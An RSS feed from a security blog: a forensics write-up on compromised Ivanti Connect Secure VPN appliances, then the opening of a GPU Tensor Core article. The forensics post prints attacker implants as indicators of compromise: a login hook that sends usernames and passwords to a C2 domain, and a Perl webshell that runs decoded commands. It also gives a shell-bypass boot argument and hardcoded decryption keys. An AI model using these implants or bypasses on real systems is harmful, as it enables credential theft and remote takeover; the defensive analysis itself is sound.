<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Engineering Deficiency @ Meekolabs]]></title><description><![CDATA[Shitposts disguised as thinly-veiled attempts at security research on Windows Kernel Exploitation, Cloud Security, Machine Learning, and other random topics]]></description><link>https://research.meekolab.com</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1715979130896/1VjiS-IsG.png</url><title>Engineering Deficiency @ Meekolabs</title><link>https://research.meekolab.com</link></image><generator>RSS for Node</generator><lastBuildDate>Sat, 18 Apr 2026 00:07:20 GMT</lastBuildDate><atom:link href="https://research.meekolab.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Forensics on Network Appliances]]></title><description><![CDATA[This research was done using hardware obtained by myself individually, analyzed using hardware owned by myself individually. Information and opinions held in this presentation are my own and do not reflect my current or previous employers
Cover Illus...]]></description><link>https://research.meekolab.com/comprehensive-ivanti-connect-secure-forensics-guide</link><guid isPermaLink="true">https://research.meekolab.com/comprehensive-ivanti-connect-secure-forensics-guide</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Tue, 02 Sep 2025 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1756914311156/5c33310a-b1af-4df5-b15e-d1d0638028cf.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p>This research was done using hardware obtained by myself individually, analyzed using hardware owned by myself individually. Information and opinions held in this presentation are my own and do not reflect my current or previous employers</p>
<p><strong><em>Cover Illustration by onigiririice</em></strong></p>
</blockquote>
<p>The materials here were partly given out in my talk “Ghost in the Machine : The Mess of Doing Forensics in Network Appliances” at ITSEC Asia Summit 2025. This is a partial (but more focused and indepth, i think) writeup for those who missed it.</p>
<h2 id="heading-intro">Intro</h2>
<p>Network appliance vulnerabilities are becoming an increasingly sticky target for threat groups (particularly APTs). Forescout had said that while in 2023 endpoints were riskier than network devices, at the end of 2023 there was a reversal and the number of exploited vulnerabilities inside of network devices, and they say that network equipment has become the riskiest IT device category surpassing endpoints.</p>
<p>While security through obscurity is an <a target="_blank" href="https://utkusen.com/blog/security-by-obscurity-is-underrated">underappreciated strategy</a>, the level of blind trust we put to hardware vendors can sometimes be abit excessive. Because of hardening requirements from standards such as FIPS 140-2, performing forensics yourself is nearly impossible with public documentation due to vendors not giving access to a shell to access the firmware, the full-disk encryption system which further complicates things, and also the fact that there are no way to exfiltrate the data once a shell has been achieved. This makes accessing the inner firmware and exfiltrating it for analysis difficult, if not impossible especially for teams without dedicated DFIR teams with RE capabilities.</p>
<p>One of my personally most memorable cases of this instance is the <a target="_blank" href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US">Ivanti Connect Secure</a> (or known as Pulse Secure under Juniper), which was hit by four consecutive different CVEs in early 2024 (CVE-2023-46805, CVE-2024-21887, CVE-2024-21893, and CVE-2024-22024). <a target="_blank" href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/">Volexity</a>, <a target="_blank" href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation">Mandiant</a>, and <a target="_blank" href="https://www.ivanti.com/blog/security-update-for-ivanti-connect-secure-and-ivanti-policy-secure-gateways">Ivanti</a> have both released IoCs and detection methods to detect a compromise, but with many vendors alot of these IoCs are only detected either by the assistance of Ivanti themselves (who require you to send the system snapshot generated by the Integrity Checking Tool (ICT) for it to be decrypted) or by hiring an expert forensics team.</p>
<h2 id="heading-the-ivanti-connect-not-so-secure">The Ivanti Connect (not-so) Secure</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1756913650664/f3295e79-7254-498d-8a1d-17d4d4858291.png" alt class="image--center mx-auto" /></p>
<p>The initial RCE vulnerability on the Ivanti started from something kinda benign, the initial VPN setup page. The Pulse Secure VPN has a page that’s normally intended to be open to the public internet where people can initially setup their Two Factor Authentication Apps. This page has an API, and through these two simple curl commands you can bypass the security checks and have an RCE directly to the firmware. Why is that function even exposed via the API is beyond me, especially as you can see the RCE itself relates to the licensing check.</p>
<p>There are two versions of Ivanti Connect Secure (or the Pulse Secure Appliance the name used by the VPN before the acquisition) :</p>
<ul>
<li><p>Hardware Appliances in the form of the Pulse Secure Appliance (PSA) series, which was released around 2015 and mostly run the LILO (Linux Loader) boatloader with a modified loop-AES disk encryption system</p>
</li>
<li><p>Hardened Virtual Appliances which are distributed for deployment within virtualization systems like ESXi and mostly run the GRUB boatloader with LUKS encryption</p>
</li>
</ul>
<p>For the hardware appliance, there are lots of places that sell enterprise grade hardware from years ago in bulk in almost every country if you look hard enough. For North American and European readers, a simple look at Ebay or subreddits like <a target="_blank" href="https://www.reddit.com/r/homelabsales/">r/homelabsales</a>. For Indonesian viewers, you can usually find some great stuff in sites like Bukalapak (which is honestly the only valid use for Bukalapak nowdays) or places like electronic-focused malls.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1707410502693/90e8bb2a-1e74-407f-92cf-300d3940fc3f.jpeg" alt class="image--center mx-auto" /></p>
<h2 id="heading-the-bootloaders">The Bootloaders</h2>
<p>While looking the console in the virtualized appliance might be trivial, to read the console in the hardware appliance we need to use the serial console via the management port using an ethernet to DB9 serial port to USB adapter, with a serial console being able to be accessed using something like PUTTY (Windows) or screen (Mac) via the USB COM port.</p>
<p>Upon booting it up, you'll be met with one of these two screens, the LILO bootloader and the GRUB Bootloader.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1708068402912/be70d0d2-2000-45c9-ab19-1fb9e40d7fe7.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1708019494599/4f386365-4819-4ce5-a61f-ee215ceca6cd.png" alt class="image--center mx-auto" /></p>
<p>While many are well accustomed to GRUB, you might be confused seeing LILO. LILO, or Linux Loader, was the predecessor for GRUB that was deprecated in 2015. Compared to GRUB it has several deficiencies like having no interactive command interfaces (it only support boot arguments) and does not support booting from a network. While limiting, these limitations might be preferable for a vendor that wants to make a locked-down linux appliance that doesn't want to develop their own proprietary bootloader.</p>
<p>In both LILO and GRUB versions, there are two versions which is the current and the rollback kernel versions. The GRUB bootloader also has the option to conduct a factory reset from the bootloader itself.</p>
<h2 id="heading-gaining-a-shell">Gaining a Shell</h2>
<p>When trying to init to <code>/bin/sh</code>, on both the GRUB-based and the LILO-based appliance, the command is ignored. This is likely an attempt to comply with the FIPS 140-2 standard, which says that vendors should ensure that only authorized users can access cryptographic functions and keys. Pulse Secure seems to comply with this by locking down the shell to the firmware, as once <code>w</code>e have a shell, we can simply search for the disk keys and use them to cold-mount the disks.</p>
<pre><code class="lang-bash">__int64 __fastcall sub_FFFFFFFF826CC601(unsigned __int8 *a1)
{
  __int64 i;

  <span class="hljs-keyword">if</span> ( strcmp(a1, <span class="hljs-string">"/bin/sh"</span>) )
    qword_FFFFFFFF827E2030 = a1;
  <span class="hljs-keyword">for</span> ( i = 0LL; i != 31; ++i )
    qword_FFFFFFFF82212168[i] = 0LL;
  <span class="hljs-built_in">return</span> 1LL;
}
</code></pre>
<p>Upon Watchtowr's analysis of the kernel, they found that Pulse Secure simply blacklist the term <code>/bin/sh</code>, which means we can just use an alternative version of the command <code>init=//bin/sh</code> . This check also applies for the LILO bootloader, which means it can be bypassed using the same method simply by using <code>current init=//bin/sh</code> to run the <code>current</code> version of the firmware</p>
<h2 id="heading-decrypting-the-firmware">Decrypting the Firmware</h2>
<p>Gaining the shell is half the battle, while many can do quick and dirty forensics using the provided shell, some may prefer to dump the firmware to another location to be analyzed using other tools or even simply to view it in a more sane way other than simply <code>cat</code>-ing the scripts inside.</p>
<p>PSA systems with LILO uses a bespoke variant of loop-AES compiled into the kernel. This setup includes the <code>loop_setup_root</code> function, designed to encrypt the root device specified in the command line by wrapping it with a crypto loopback device using a hardcoded key. This operation occurs during the system's boot process, specifically within the <code>prepare_namespace</code> function, just before the root filesystem is mounted. While GRUB based appliances, according to Watchtowr, is encrypted with LUKS.</p>
<h3 id="heading-for-grub-based-appliances">For GRUB-based Appliances</h3>
<p>Upon gaining a shell, we can read the keys which are stored is stored inside <code>/etc/lvmkey</code></p>
<pre><code class="lang-bash">sh-4.1<span class="hljs-comment"># cat -vE /etc/lvmkey</span>
$
M-9M-^^M-OM-^IuNM-G`^XM-J^NM-Z]jM-G
</code></pre>
<p>The file is presented in non-printable characters, where <code>^</code> symbols denote control characters, <code>M-</code> prefixes indicate characters with the eighth bit set (extending the ASCII range to include characters from 128 to 255), and <code>$</code> represents the newline character. Each character or symbol combination from the output is mapped to its corresponding hexadecimal value. For example, <code>M-9</code> translates to a character in the extended ASCII range, obtained by adding 128 to the ASCII value of <code>9</code>, resulting in <code>b9</code>. Control characters, like <code>^X</code>, are interpreted based on their control sequence meaning, with <code>^X</code> representing the hexadecimal value <code>18</code>. Regular ASCII characters are directly mapped to their hexadecimal values (e.g., <code>u</code> to <code>75</code>).</p>
<p>After decoding it to hexadecimal we get the following key.</p>
<pre><code class="lang-c">\x0a\xb9\x9e\xcf\x89\x75\x4e\xc7\x60\x18\xca\x0e\xda\x5d\x6a\xc7
</code></pre>
<p>We can now use this to decrypt the LUKS volumes.</p>
<h3 id="heading-for-lilo-based-appliances">For LILO-based Appliances</h3>
<p>For LILO, the method might be a little bit complicated as the disk is encrypted using a custom implementation of loop-AES, which supports multiple CBC modes in AES but differing in the generation of per-sector Initialization Vectors. It also includes the ability to generate multiple keys from the same key material, selecting a specific key based on the sector number's modulus with the total number of keys.</p>
<p>However, Pulse Secure uses a simplified model by employing a single key mode and embedding it as a hardcoded key directly into the kernel. I guess the rationale is that nobody with bad intentions will ever go into the appliance to tinker with it in this way.</p>
<p>But Pulse Secure modified the loop-AES's CBC mode, as the ciphertext is XOR-ed with a decrypted version of the per sector IV before decryption begins. So given :</p>
<ul>
<li><p><em>Dk()</em> as the AES decryption operation with key <em>K</em></p>
</li>
<li><p><em>IV</em> as the initialization vector for the block, which is the sector number encoded as a 16-byte little endian for the first block and the ciphertext of the previous block for subsequent blocks</p>
</li>
<li><p><em>Ci</em>​ as the i-th ciphertext block</p>
</li>
</ul>
<p>The IV (either derived from the sector number for the first block or the previous ciphertext block for subsequent blocks) is decrypted using <em>Dk</em>​, the AES decryption function with the key <em>K</em>. The ciphertext block <em>Ci</em>​ is XORed with the decrypted IV (<em>IV</em>′), reversing the final layer of encryption applied during the encryption process.</p>
<p>The result of the XOR operation <em>X</em> is then decrypted using <em>Dk</em>​, undoing the AES encryption applied to the plaintext during the initial encryption. The intermediate plaintext <em>Pi</em>′​ is XORed again with the original IV to completely reverse the initial xor-encrypt-xor process and recover the original plaintext block <em>Pi</em>​. In code this will look like :</p>
<pre><code class="lang-python"><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">xor</span>(<span class="hljs-params">s1, s2</span>):</span>
    <span class="hljs-keyword">return</span> bytes(c1 ^ c2 <span class="hljs-keyword">for</span> c1, c2 <span class="hljs-keyword">in</span> zip(s1, s2))

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">ivanti_cbc_decrypt</span>(<span class="hljs-params">key, sector_number, encrypted_data</span>):</span>
    <span class="hljs-comment"># initialize AES cipher in ECB mode</span>
    cipher = AES.new(key=key, mode=AES.MODE_ECB)

    <span class="hljs-comment"># decrypt blocks of data</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">decrypt_block</span>(<span class="hljs-params">iv, data_blocks</span>):</span>
        <span class="hljs-keyword">for</span> block <span class="hljs-keyword">in</span> data_blocks:
            pre_iv = cipher.decrypt(iv)
            xor_ciphertext = xor(block, pre_iv)
            plaintext_block = cipher.decrypt(xor_ciphertext)
            final_plaintext = xor(plaintext_block, iv)
            <span class="hljs-keyword">yield</span> final_plaintext
            iv = block
    iv = sector_number.to_bytes(length=<span class="hljs-number">16</span>, byteorder=<span class="hljs-string">'little'</span>)
    data_blocks = [encrypted_data[i:i+<span class="hljs-number">16</span>] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">0</span>, len(encrypted_data), <span class="hljs-number">16</span>)]
    decrypted_data = <span class="hljs-string">b''</span>.join(decrypt_block(iv, data_blocks))
    <span class="hljs-keyword">return</span> decrypted_data
</code></pre>
<p>As every kernel version has different keys, its recommended for you to try this yourself on your own appliances.</p>
<h2 id="heading-forensics-object-of-focus">Forensics Object of Focus</h2>
<p>After leaving the appliance as a honeypot on for sometime for it to be indexed by sites like Censys and Shodan, there are three components usually targeted that you need to check for :</p>
<h3 id="heading-lastauthserverusedjs">lastauthserverused.js</h3>
<p>This component is related to managing user preferences related to authentication and login processes. Attackers modify the <code>Login(setCookies)</code> function to forward the login information of VPN users to a selected C2 domain.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Login</span>(<span class="hljs-params">setCookies</span>) </span>{
<span class="hljs-comment">// NOTE START : THIS IS THE EXPLOIT</span>
    <span class="hljs-keyword">var</span> wdata = <span class="hljs-built_in">document</span>.frmLogin.username.value;
    <span class="hljs-keyword">var</span> sdata = <span class="hljs-built_in">document</span>.frmLogin.password.value;
    <span class="hljs-keyword">if</span> (wdata &amp;&amp; sdata) {
        <span class="hljs-keyword">var</span> wdata = btoa(wdata);
        <span class="hljs-keyword">var</span> sdata = btoa(sdata);
        <span class="hljs-keyword">const</span> url = <span class="hljs-string">'c2attackerdomain[.]com'</span><span class="hljs-string">'+wdata+'</span>&amp;<span class="hljs-string">'+sdata'</span>;
        <span class="hljs-keyword">var</span> xhr = <span class="hljs-keyword">new</span> XMLHttpRequest();
        xhr.open(<span class="hljs-string">'GET'</span>,url, <span class="hljs-literal">false</span>);
        xhr.send(<span class="hljs-literal">null</span>);
    }
<span class="hljs-comment">// NOTE END : THIS IS THE EXPLOIT</span>
    <span class="hljs-comment">// Remember currently selected auth realm</span>
    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">typeof</span>(setCookies) == <span class="hljs-string">"number"</span> &amp;&amp; setCookies == <span class="hljs-number">0</span>) {
    }
    <span class="hljs-keyword">else</span> {
        LoginImpl();
    }
    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">document</span>.frmLogin.tz_offset != <span class="hljs-literal">null</span>) {
      <span class="hljs-keyword">var</span> wdate = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span> (<span class="hljs-number">95</span>, <span class="hljs-number">12</span>, <span class="hljs-number">1</span>);
      <span class="hljs-keyword">var</span> sdate = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span> (<span class="hljs-number">95</span>, <span class="hljs-number">6</span>, <span class="hljs-number">1</span>);
      <span class="hljs-keyword">var</span> winter = (<span class="hljs-number">-1</span>) * wdate.getTimezoneOffset();
      <span class="hljs-keyword">var</span> summer = (<span class="hljs-number">-1</span>) * sdate.getTimezoneOffset();
      <span class="hljs-built_in">document</span>.frmLogin.tz_offset.value = winter &lt; summer ? winter : summer;
    }
    <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">LoginPPC</span>(<span class="hljs-params">setCookies</span>) </span>{
    LoginImpl();
    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">document</span>.frmLogin.username != <span class="hljs-literal">null</span>) {
        <span class="hljs-keyword">var</span> URL = GetCookieValue(<span class="hljs-string">'DSSignInURL'</span>);
        SetLastWsamInfo(<span class="hljs-built_in">document</span>.frmLogin.username.value, URL);
    }
    <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;
}
</code></pre>
<h3 id="heading-compcheckresultcgi-amp-dslogpm">compcheckresult.cgi &amp; DSlog.pm</h3>
<p><code>compcheckresult.cgi</code> is used by the appliance to determine the compatibility of client systems with specific components (e.g., SAM, NC, Host Checker, JNAM) based on the client's browser and platform (Windows, Mac, Linux). This script is executed when a user visits the appliance gateway interface and also call another perl script called <code>DSLog.pm</code>.</p>
<pre><code class="lang-perl"><span class="hljs-comment">#!/home/ecbuilds/int-rel/sa/9.1/bld24995.1/install/perl5/bin/perl -T</span>
<span class="hljs-comment"># -*- mode:perl; cperl-indent-level: 4; indent-tabs-mode:nil -*-</span>
<span class="hljs-comment">#</span>
<span class="hljs-comment">#  Copyright (c) 2005-2017 by Pulse Secure, LLC. All rights reserved</span>
<span class="hljs-comment">#</span>

<span class="hljs-keyword">use</span> lib ($ENV{<span class="hljs-string">'DSINSTALL'</span>} =~ <span class="hljs-regexp">/(\S*)/</span>)[<span class="hljs-number">0</span>] . <span class="hljs-string">"/perl"</span>;
<span class="hljs-keyword">use</span> lib ($ENV{<span class="hljs-string">'DSINSTALL'</span>} =~ <span class="hljs-regexp">/(\S*)/</span>)[<span class="hljs-number">0</span>] . <span class="hljs-string">"/perl/lib"</span>;

<span class="hljs-keyword">use</span> strict;
<span class="hljs-keyword">use</span> CGI <span class="hljs-string">qw(:standard)</span>;
<span class="hljs-keyword">use</span> DSSafe;
<span class="hljs-keyword">use</span> DSCBMeeting;
<span class="hljs-keyword">use</span> DSUI;
<span class="hljs-keyword">use</span> DSI18N;
<span class="hljs-keyword">use</span> DSHTMLUI;
<span class="hljs-keyword">use</span> DSSessionsManager;
<span class="hljs-keyword">use</span> DSLog;
</code></pre>
<p>The script below is then run which contains the following webshell which begins by capturing the user's browser's user agent string and the query string from the environment variables. The script then checks if the user agent contains a specific hash value. If this condition is met and there is a second parameter in the query string, the script proceeds to parse this parameter.</p>
<pre><code class="lang-perl"><span class="hljs-keyword">my</span> $ua = $ENV<span class="hljs-string">{HTTP_USER_AGENT}</span>;
<span class="hljs-keyword">my</span> $req = $ENV<span class="hljs-string">{QUERY_STRING}</span>;
<span class="hljs-keyword">my</span> $qur = <span class="hljs-string">"0d570ddf3e373a06346cbb3f68942082d69e8af0022d152e87a41e9836e0bc7e"</span>;
<span class="hljs-keyword">my</span> @param = <span class="hljs-keyword">split</span>(<span class="hljs-regexp">/&amp;/</span>, $req);
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">index</span>($ua, $qur) != -<span class="hljs-number">1</span>) {
    <span class="hljs-keyword">if</span> ($param[<span class="hljs-number">1</span>]){
        <span class="hljs-keyword">my</span> @res = <span class="hljs-keyword">split</span>(<span class="hljs-regexp">/=/</span>, $param[<span class="hljs-number">1</span>]);
        <span class="hljs-keyword">if</span> ($res[<span class="hljs-number">0</span>] e<span class="hljs-string">q ("cdi")</span>{
           $res[<span class="hljs-number">1</span>] =~ <span class="hljs-regexp">s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg</span>;
           $res[<span class="hljs-number">1</span>] =~ <span class="hljs-regexp">tr/!-~/P-~!-O/</span>;
           <span class="hljs-keyword">system</span>(${res[<span class="hljs-number">1</span>]})
        }
    }
}
</code></pre>
<p>The parameter is expected to follow a format where it is divided into a key and value pair, separated by an equal sign. The script specifically looks for the parameter key "cdi". If found, it decodes the value associated with this key from a hexadecimal representation to ASCII, applies a Caesar cipher shift to the decoded string, and then executes the resulting string as a system command.</p>
<p>There are many other IoCs from Mandiant, Volexity, and Watchtowr you should watchout for. This is not in any way an exhaustive list.</p>
<h2 id="heading-non-invasive-forensics">Non-Invasive Forensics</h2>
<p>Entering custom boot commands, dumping firmware via netcat, and decrypting LUKS drives using a python script from a stranger on the internet might sound scaring (and downright unaccepted in some mature enterprise settings).</p>
<p>For non-invasive and drive-by forensics, Ivanti recommends the usage of the <a target="_blank" href="https://forums.ivanti.com/s/article/KB44755?language=en_US">Integrity Checker Tool (ICT)</a> provided by Ivanti which scans the System Snapshot Log for signs of compromise, new files, and mismatched hashes. But since Ivanti themselves recommend against trusting the internal ICT, we can acquire the log results of the ICT scan manually from the appliance by the System Snapshot log using the panel in <code>/dana-admin/dump/dump.cgi</code> and select <code>Take Snapshot</code> and then selecting <code>Download Admin Generated Snapshot</code> to download the log.</p>
<p>However, the snapshot itself is encrypted and regular individuals cannot decrypt it without the help of Ivanti themselves which have been innundated with decryption and support requests due to the zero-day fiasco.</p>
<p>Searching around the internet, i found this unique PoC screenshot by nccgrroup for a different <a target="_blank" href="https://research.nccgroup.com/2021/08/05/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-archive-extraction-cve-2021-22937-patch-bypass/">older zero day</a> affecting Pulse Secure which shows the key for the encrypted appliance. Turns out this is the universal hardcoded 3DES key to decrypt the ICT result.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1708083667304/1f870368-0033-4e95-9788-d163a3800489.png" alt class="image--center mx-auto" /></p>
<p>So we can create a simple python script to decode the encrypted ICT file.</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> sys
<span class="hljs-keyword">import</span> struct
<span class="hljs-keyword">import</span> argparse
<span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> DES3

<span class="hljs-comment"># Hardcoded DES3 key for decryption</span>
HARDCODED_KEY = bytes.fromhex(<span class="hljs-string">"7e95421a6b886641431b32c52442e2e483f81f58b0e9e9a5"</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">decrypt</span>(<span class="hljs-params">ciphertext, key, iv</span>):</span>
    <span class="hljs-string">"""Decrypts ciphertext using Triple DES (DES3) with CFB mode."""</span>
    cipher = DES3.new(key, DES3.MODE_CFB, iv, segment_size=<span class="hljs-number">64</span>)
    <span class="hljs-keyword">return</span> cipher.decrypt(ciphertext)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">parse_encrypted_config</span>(<span class="hljs-params">filename</span>):</span>
    <span class="hljs-string">"""Extracts the key, IV, and ciphertext from an encrypted snapshot file."""</span>
    <span class="hljs-keyword">with</span> open(filename, <span class="hljs-string">'rb'</span>) <span class="hljs-keyword">as</span> file:
        file.seek(<span class="hljs-number">1</span>)  <span class="hljs-comment"># Skip header or version byte</span>
        iv = file.read(<span class="hljs-number">8</span>)  <span class="hljs-comment"># Read 8-byte IV</span>
        file.seek(<span class="hljs-number">1</span>, <span class="hljs-number">1</span>)  <span class="hljs-comment"># Skip a byte indicating use of the hardcoded key</span>
        size = struct.unpack(<span class="hljs-string">'&lt;i'</span>, file.read(<span class="hljs-number">4</span>))[<span class="hljs-number">0</span>]  <span class="hljs-comment"># Get the size of encrypted data</span>
        ciphertext = file.read(size)  <span class="hljs-comment"># Read the ciphertext</span>
    <span class="hljs-keyword">return</span> HARDCODED_KEY, iv, ciphertext

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
    parser = argparse.ArgumentParser(description=<span class="hljs-string">'Decrypt Ivanti Connect Secure ICT.'</span>)
    parser.add_argument(<span class="hljs-string">"action"</span>, help=<span class="hljs-string">"Specify the 'decryption' action"</span>, choices=(<span class="hljs-string">'decryption'</span>,))
    parser.add_argument(<span class="hljs-string">"input"</span>, help=<span class="hljs-string">"Path to the encrypted snapshot file"</span>)

    args = parser.parse_args()

    <span class="hljs-keyword">if</span> args.action == <span class="hljs-string">"decryption"</span>:
        key, iv, ciphertext = parse_encrypted_config(args.input)
        decrypted_data = decrypt(ciphertext, key, iv)
        output_filename = <span class="hljs-string">'snapshot.tar'</span>
        <span class="hljs-keyword">with</span> open(output_filename, <span class="hljs-string">'wb'</span>) <span class="hljs-keyword">as</span> output_file:
            output_file.write(decrypted_data)
        print(<span class="hljs-string">'Decryption complete.'</span>)
</code></pre>
<p>This method has been tested to work in both the virtualized appliance and the physical appliance version of Pulse Secure/Ivanti Connect Secure. Inside the file there contains the following :</p>
<ul>
<li><p><code>ls</code> of all system folders</p>
</li>
<li><p>Supported filesystems and their status (e.g., ext3, vfat, nfs)</p>
</li>
<li><p>Device driver allocations for character and block devices (e.g., mem, sd, loop)</p>
</li>
<li><p>Memory usage, including total, free, and specific usage types (e.g., Buffers, Cached, Swap)</p>
</li>
<li><p>Slab allocator statistics, detailing kernel object caching</p>
</li>
<li><p>Swap space configuration</p>
</li>
<li><p>Mounted filesystems, detailing mount points and filesystem types</p>
</li>
<li><p>System load average over 1, 5, and 15 minutes</p>
</li>
<li><p>Network interface statistics, including received and transmitted packets</p>
</li>
<li><p>IP routing table</p>
</li>
<li><p>File lock information, showing locks held by processes</p>
</li>
<li><p>CPU condition and aggregated CPU time spent in various states</p>
</li>
<li><p>XFRM (IPsec) statistics</p>
</li>
<li><p>Netfilter queue configurations</p>
</li>
<li><p>Netlink socket details</p>
</li>
<li><p>IRQ (Interrupt Request) affinities for specific devices</p>
</li>
<li><p>cgroups configuration</p>
</li>
<li><p>and more... (i haven't read the full thing lol)</p>
</li>
</ul>
<p>You can use this data to figure out if any added scripts or unauthorized processes were running inside your device at the time the system snapshot was executed. However, to match file hashes with known good file hashes the appliance uses a <code>manifest</code> file inside of the appliance or attached alongside the external ICT, which makes verifying the existence of modified components of the appliance impossible using the snapshot alone.</p>
<p>However, in my experience this could be an easy way and fast way to detect signs of compromise without having to physically connect to the appliance inside of a cold server room. This can prove useful to determine whether more direct action is needed to fully analyze the appliance or not.</p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>So what did we learn from all this? Probably that attackers are now shifting their focus to less secured devices in the perimeter of the network. Because of course an Endpoint EDR can only see indicators of compromise inside of an endpoint, it rarely can identify that it is connected to a compromised appliance.</p>
<p>And ultimately is that all of this is just very hard. Cryptographically function cracking, firmware decryption, linux kernel analysis, if you’re able to do all of that you won’t settle working in incident response. You would be working in vulnerability research to find zero days and easily make ten times more. The unfortunate truth is that so far there hasn’t really been an effective way to detect, analyze, and tackle these types of attacks.</p>
]]></content:encoded></item><item><title><![CDATA[Messing Around with GPUs Again]]></title><description><![CDATA[Cover Illustration by atomic_arctic

While doing matrixes on GPUs are kind of overplayed, they still represent one of the most important computation for modern AI workloads, making up the vast majority of FLOPS during both training and inference of d...]]></description><link>https://research.meekolab.com/messing-around-with-gpus-again</link><guid isPermaLink="true">https://research.meekolab.com/messing-around-with-gpus-again</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Mon, 16 Jun 2025 03:22:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1749543516317/7712c94a-7571-4cec-aa7c-dd6112997d9c.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by</em></strong> atomic_arctic</p>
</blockquote>
<p>While doing matrixes on GPUs are kind of overplayed, they still represent one of the most important computation for modern AI workloads, making up the vast majority of FLOPS during both training and inference of deep learning models. Even if your kernels don’t get near cuBLAS performance, it will still teach you alot about low-level GPU architecture and their performance characteristics.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744288261688/de451dd6-9902-4cfa-9941-510ab77c6275.png" alt class="image--center mx-auto" /></p>
<p>NVIDIA introduced Tensor Cores starting with the Volta generation of GPUs to accelerate applications represented by AI inference and training, which typically involve large-scale matrix multiplication or matrix-multiplication-like workloads. After all, CUDA Cores have limited computing power, and there would be a lot of memory bandwidth wasted on matrix multiplication, which is a typical compute-intensive workload. The addition of Tensor Cores allows GPUs to utilize their memory bandwidth of several hundred GB/s during matrix multiplication computations. Tensor Cores were later added to the RTX series of graphics card, with AI workloads starting to be more important for prosumers and gamers (technologies like DLSS and frame generation).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744288745528/79a4314c-fda0-4729-aa8e-883557da9c88.png" alt class="image--center mx-auto" /></p>
<p>Each Streaming Multiprocessor (SM) in the Hopper architecture is a powerful compute unit containing both traditional CUDA cores and specialized Tensor Cores. In the full GH100 “Hopper” GPU (which powers H100), there are 144 SMs arranged across 8 GPCs (Graphics Processing Clusters), with 2 SMs per TPC (Texture Processing Cluster). The H100 SXM5 variant has 132 SMs enabled (the PCIe version has 114)​developer.nvidia.com. <strong>Within each SM, there are 128 FP32 CUDA cores and four 4th-generation Tensor Cores</strong>​​. The CUDA cores handle standard scalar/thread-parallel operations (integer and floating-point ALU tasks), while the Tensor Cores are dedicated matrix-math units designed for massively parallel multiply-accumulate operations on matrices. These Tensor Cores are tightly integrated into the SM’s datapath and scheduling fabric, allowing warp-level matrix operations to execute alongside normal instructions.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744288957613/5ce05b78-368e-4c05-b024-d7cfff86f322.png" alt class="image--center mx-auto" /></p>
<p>Hopper Tensor Cores support a broad range of numerical formats including FP64, TF32, BF16, FP16, INT8, and most notably FP8—a new 8-bit format (E4M3 and E5M2) tailored for AI workloads. These data types operate under mixed-precision accumulation, e.g., FP8 inputs accumulating in FP16 or FP32, optimizing both performance and accuracy. While hybrid-precision formats are not new such as in <a target="_blank" href="https://arxiv.org/pdf/2209.05433"><strong>Micikevicius et al. (2022</strong>)</a> which use E4M3 in Fprop and E5M2 in Dgrad and Wgrad, newer architectures like DeepSeek adopts the E4M3 format universally. By operating on smaller element groups, their methodology effectively shares exponent bits among grouped elements, mitigating the impact of limited dynamic range.</p>
